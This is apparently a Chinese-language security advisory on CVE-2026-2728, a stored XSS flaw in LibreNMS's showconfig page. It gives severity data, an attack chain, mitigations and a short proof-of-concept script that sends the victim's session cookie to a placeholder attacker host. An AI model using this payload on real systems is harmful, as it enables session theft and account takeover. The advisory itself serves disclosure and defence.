CVE-2026-2728 CVSS 4.8 中危

CVE-2026-2728 LibreNMS存储型XSS漏洞

披露日期: 2026-04-13

来源: ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a

漏洞信息

漏洞编号

CVE-2026-2728

漏洞类型

跨站脚本 (XSS)

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

LibreNMS

漏洞概述

LibreNMS 26.3.0之前的版本中，showconfig页面存在一个经过身份验证的跨站脚本（XSS）漏洞。由于该页面未正确过滤用户输入，拥有管理员权限的攻击者可以注入恶意脚本。当其他用户访问受影响的页面时，这些脚本将被执行，从而导致账户劫持或进一步的攻击行为。

技术细节

该漏洞位于LibreNMS的showconfig页面组件中。应用程序在渲染配置信息时，未对管理员提交的特定字段进行HTML实体编码或上下文感知的输出编码。攻击者利用管理员账户登录后，可以在配置参数中插入JavaScript Payload。虽然漏洞利用需要高权限（PR:H），但一旦Payload被存储在服务器端，任何查看该配置页面的用户都会在浏览器端触发XSS。攻击者可借此窃取Session Cookie、重定向用户或执行未授权操作。

攻击链分析

STEP 1

步骤1

攻击者获取LibreNMS的管理员账户凭证（由于漏洞需要高权限）。

STEP 2

步骤2

攻击者登录并导航到存在漏洞的showconfig页面。

STEP 3

步骤3

攻击者在配置输入字段中注入恶意的JavaScript代码并保存。

STEP 4

步骤4

系统将恶意配置数据存储在数据库中，未经过滤。

STEP 5

步骤5

普通用户或其他管理员访问showconfig页面查看配置。

STEP 6

步骤6

服务器渲染页面时直接输出恶意脚本，受害者浏览器执行该脚本，攻击生效。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-2728
Inject the following payload into the vulnerable field on the showconfig page.
-->
<script>
  // Simple alert to verify execution
  alert('CVE-2026-2728 XSS Triggered');

  // Example: Exfiltrate session cookie
  var img = new Image();
  img.src = "http://attacker-server.com/log?c=" + encodeURIComponent(document.cookie);
</script>

影响范围

LibreNMS < 26.3.0

防御指南

临时缓解措施

在未升级版本前，建议严格限制管理员账户的权限分配，确保只有信任的人员拥有管理员权限。管理员应避免在配置字段中输入非标准字符，并定期审计系统配置项中是否包含异常的脚本代码。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表